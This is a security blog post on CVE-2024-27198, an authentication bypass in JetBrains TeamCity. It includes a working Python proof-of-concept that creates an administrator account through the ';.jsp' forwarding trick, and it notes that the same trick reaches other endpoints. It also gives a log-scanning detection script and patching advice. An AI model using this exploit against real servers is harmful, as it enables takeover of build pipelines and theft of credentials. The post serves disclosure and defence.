CVE-2024-27198 - How a TeamCity Authentication Bypass Let Attackers Go Full Admin
In early 2024, security researchers uncovered a critical vulnerability in JetBrains TeamCity, the CI/CD server that thousands of companies use to automate their build and deployment pipelines. Tracked as CVE-2024-27198, the flaw let anyone who could reach the web interface skip TeamCity's login entirely and create an administrator account for themselves.
In this post, we'll break down what went wrong, how attackers exploited it (with code examples), the impact, and what you should do if you're still running a version older than 2023.11.4.
What Is TeamCity?
If you haven’t used it: TeamCity (from JetBrains) is a tool that automates building and deploying code. It’s widely used for its ease-of-use and plugin ecosystem.
But that also makes it an attractive target for attackers: a TeamCity server typically holds credentials for source repositories, artifact stores and deployment targets, and whoever controls it can change what gets built and shipped.
What Happened?
In versions of TeamCity before 2023.11.4, a flaw in the web request handling let a request for a non-existent page be forwarded internally to any authenticated endpoint, including the REST API, without the login check being applied. Put simply, by crafting a request in a specific way, an unauthenticated attacker could create a new administrator user and then do anything an admin can: read project configuration and source code, steal stored credentials and tokens, or change build steps to deploy malware.
Severity: Critical (CVSS v3.1 base score 9.8). The bug is reachable over the network, needs no credentials and no user interaction.
The API Flaw
TeamCity's REST API under /app/rest/ is protected by the normal authentication, and requesting it directly without credentials returns 401. The bug sits elsewhere: in the code path that handles a request for a page that does not exist. That 404 handler accepts a jsp query parameter naming a page to forward to, checks only that the name ends in .jsp, and then forwards the request internally, after the authentication decision for the original (unprotected, non-existent) URL has already been made. Because the bundled servlet container ignores a ;.jsp path-parameter suffix when routing, the forward can be pointed at any authenticated endpoint, including the REST API.
Here's a simplified proof-of-concept exploit, targeting a vulnerable TeamCity server. It creates an administrator account through the REST API without ever logging in:
import requests

# Change these as needed
TEAMCITY_URL = "http://victim-teamcity:8111"
NEW_USERNAME = "haxor"
NEW_PASSWORD = "P@sswrd!"

# 1. Create a new admin user - no auth.
# /hax is any path that does not exist: TeamCity prepares a 404 for it and
# then looks at the "jsp" parameter. The ";.jsp" suffix satisfies the
# ".jsp" check, but the servlet container drops it when routing, so the
# request is forwarded to /app/rest/users with the login check already skipped.
resp = requests.post(
    f"{TEAMCITY_URL}/hax?jsp=/app/rest/users;.jsp",
    headers={
        "Content-Type": "application/json",
        "Accept": "application/json",
    },
    # TeamCity's REST user model nests roles as {"roles": {"role": [...]}};
    # scope "g" means the role is granted globally.
    json={
        "username": NEW_USERNAME,
        "password": NEW_PASSWORD,
        "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]},
    },
    timeout=10,
)

if resp.status_code in (200, 201):
    print("[+] Admin user created:", NEW_USERNAME)
else:
    print("[-] Failed, server response:", resp.status_code, resp.text)
How does this work?
- /hax is not a protected path, so the request is let through without a login; since the page does not exist, the server gets ready to answer 404
- Before returning that 404, the request handler looks for a jsp query parameter and, if its value ends in .jsp, forwards the request internally to that path. The forward happens server-side, so it never passes through the authentication check again
- /app/rest/users;.jsp ends in .jsp, which satisfies the check, but the servlet container treats ;.jsp as a path parameter and routes the forwarded request to /app/rest/users, the REST endpoint that creates users
Now, log in with the new credentials, and you're full admin.
The same trick works for any other authenticated endpoint: swap the jsp value to dump server configuration, read project settings and source code, or register a malicious build agent.
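Because the exploit never touches the login page, the only trace is the request shape itself: a jsp query parameter whose value ends in .jsp only because of a ;.jsp path parameter, typically on a path that does not exist and yet gets a 200. The following detection script is an added example written for this post, not code from the original article or from JetBrains or Rapid7. It runs over constructed Combined Log Format lines (the format a reverse proxy in front of TeamCity would write); the IP addresses, timestamps and requests are made up for the example.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote, urlsplit

# Constructed sample log, not real captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Mar/2024:19:02:11 +0000] "GET /login.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Mar/2024:19:02:12 +0000] "POST /hax?jsp=/app/rest/users;.jsp HTTP/1.1" 200 312 "-" "python-requests/2.31.0"
203.0.113.9 - - [04/Mar/2024:19:02:13 +0000] "GET /hax?jsp=%2Fapp%2Frest%2Fserver%3B.jsp HTTP/1.1" 200 1044 "-" "curl/8.4.0"
10.0.0.7 - - [04/Mar/2024:19:03:40 +0000] "GET /app/rest/builds HTTP/1.1" 401 0 "-" "TeamCity-Agent"
198.51.100.2 - - [04/Mar/2024:19:04:01 +0000] "GET /nope?jsp=/about.jsp HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


@dataclass
class BypassHit:
    ip: str
    ts: str
    method: str
    target: str        # request target exactly as logged
    status: int
    forwarded_to: str  # authenticated path the server would forward to


def query_params(target: str) -> dict:
    """Split the query string on '&' only. parse_qs() in older Pythons also
    splits on ';', which would destroy the ';.jsp' path parameter we look for."""
    params: dict = {}
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return params


def bypass_target(target: str):
    """Return the forward destination if the request carries the CVE-2024-27198
    signature, else None.

    Signature: a 'jsp' query parameter whose value only ends in '.jsp' because
    of a ';' path-parameter segment, e.g. '/app/rest/users;.jsp'. A value that
    is a genuine .jsp page ('/about.jsp') is not flagged."""
    for value in query_params(target).get("jsp", []):
        path, sep, _ = value.partition(";")
        if sep and value.endswith(".jsp") and not path.endswith(".jsp"):
            return path
    return None


def scan_log(text: str) -> list:
    """Parse each log line and keep those matching the bypass signature.
    Status is recorded but not used to filter: a successful exploit is logged
    as a 200 on a path (/hax) that does not exist, which is itself a tell."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        dest = bypass_target(m["target"])
        if dest is not None:
            hits.append(BypassHit(m["ip"], m["ts"], m["method"], m["target"],
                                  int(m["status"]), dest))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit.ts} {hit.ip} {hit.method} {hit.target} -> {hit.status} "
              f"(forwarded to {hit.forwarded_to})")
```

Run it as-is to see the two exploit lines flagged (the user-creation POST and a URL-encoded variant aimed at /app/rest/server), while the benign 404 with a real .jsp target is ignored. The script deliberately decodes percent-encoding before matching, since in-the-wild scanners encoded the `;` and `/` to slip past naive string searches for `;.jsp`. Legitimate TeamCity traffic does not carry a jsp parameter pointing at a ;-suffixed path, so every hit deserves a look.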
How Was It Found?
- Discovered by Stephen Fewer of Rapid7 and reported to JetBrains in February 2024; Rapid7 published the full technical analysis on the day of public disclosure (Rapid7 Blog Post)
- JetBrains confirmed the issue and shipped the fix in TeamCity 2023.11.4 on 4 March 2024 (JetBrains Advisory)
How to Patch
Upgrade IMMEDIATELY to TeamCity 2023.11.4 or newer. Only self-hosted TeamCity On-Premises servers need action; JetBrains patched TeamCity Cloud itself. Get it here:
https://www.jetbrains.com/teamcity/download/
If your server was reachable from the internet while unpatched, upgrading alone is not enough: the bug was mass-exploited within hours of disclosure, so assume the bypass was used and review user accounts, access tokens and registered build agents for anything you did not create before trusting the server again.
Reference Links
- JetBrains Blog: Official Advisory (CVE-2024-27198, fixed in 2023.11.4)
- Rapid7's Original Research & Full Technical Details
- NVD (National Vulnerability Database) CVE Entry
Conclusion: Why This Matters
CVE-2024-27198 is one of the worst CI/CD bugs in recent memory: it needs no credentials, a single HTTP request exploits it, and it was being scanned for and exploited within hours of public disclosure. Combined with TeamCity's access to source code, secrets and deployment targets, that makes it a must-fix for every self-hosted installation. Keep your DevOps tools updated and keep them off the public internet, because one missed patch can turn into an organisation-wide breach.
Timeline
Published on: 03/04/2024 18:15:09 UTC
Last modified on: 03/11/2024 15:15:47 UTC